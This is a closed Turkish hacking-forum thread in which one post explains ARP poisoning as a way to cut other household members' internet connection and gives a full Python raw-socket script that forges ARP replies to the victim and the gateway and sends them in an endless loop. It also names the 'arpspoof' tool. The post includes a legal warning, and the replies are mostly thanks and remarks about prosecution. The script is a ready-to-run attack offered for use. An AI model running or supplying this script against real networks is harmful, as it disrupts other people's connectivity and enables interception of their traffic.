Kablolu veya Kablosuz farketmez internetten düşürmeden insanların internetini kesme (Arp Poisoning / Spoofing)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
My Name İs Buruno
Seçkin Üye
7 HİZMET YILI
iyide modem arayüzünde baglı cihazları gösteriyor oradan engelleyebiliyorsun diye biliyorum

ég ríf ykkur í bita
Süper Üye
Ödüller
6
6 HİZMET YILI
güzel bilgi umarım güzel ellerde kullanılır :D

Onaylı Üye
6 HİZMET YILI
windows tabanlı çalışan bir programıda vardı elimde bulursam forumda yayınların.
teşekkürler.

Banlı Üye
8 HİZMET YILI
Önemli NOT: Teknik olarak bu işlem bir saldırı olup kendinize ait olmayan bir ağ üzerinde yapıp yakalanırsanız 2-4 yıl arası yargılanabilirsiniz. Saldırının dezavantajı, işi bilen kişiye karşı kendi kimliğinizi kabak gibi ortada bırakıyor. Kendi evinizde yapın başkasına bulaşmayın !!!
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.

Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.

Python kodu:

Python:
import socket

import struct

import binascii

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))

s.bind(("eth0", socket.htons(0x0800)))

#Saldırgan mac, kurban mac, router mac (Kendinize göre editleyin)

attckmac = '\xff\xff\xff\xff\xff\xff'

victimmac = '\xff\xff\xff\xff\xff\xff'

gatewaymac = '\xff\xff\xff\xff\xff\xff'

code = '\x08\x06'

ethernet1 = victimmac + attckmac + code

ethernet2 = gatewaymac + attckmac + code

htype = '\x00\x01'

protype = '\x08\x00'

hsize = '\x06'

psize = '\x04'

opcode = '\x00\x02'

#Kurban ip, yeni gateway ip

gateway_ip = '192.168.1.x'

victim_ip = '192.168.1.x'

gatewayip = socket.inet_aton ( gateway_ip )

victimip = socket.inet_aton ( victim_ip )

victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip

gateway_ARP = ethernet2 + htype + protype + hsize + psize + opcode + attckmac + victimip + gatewaymac + gatewayip

while 1:

s.send(victim_ARP)

s.send(gateway_ARP)
knk bir şey diycem scappy kullanarak yazmıştım sen farklı bir yöntemle yazmışsın hll

Üye
Ödüller
3
7 HİZMET YILI
internetten yapılan işlerin suç olmadığı yerlerde kullanılabilir

Onaylı Üye
Ödüller
4
7 HİZMET YILI
bir ara bilişim suçundan yargılandım iyi olmuyor

Onaylı Üye
Ödüller
9
9 HİZMET YILI
çok sağol gayet işe yaradı ama web interfaceden yapabilrsin

Nhom
Onaylı Üye
Ödüller
4
6 HİZMET YILI
Wow, so cool man, thanks, I go use this

Onaylı Üye
8 HİZMET YILI
kablolunun hızını azaltırsın ama her kullanan için. modem ayarları değiştirme yaparsan

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...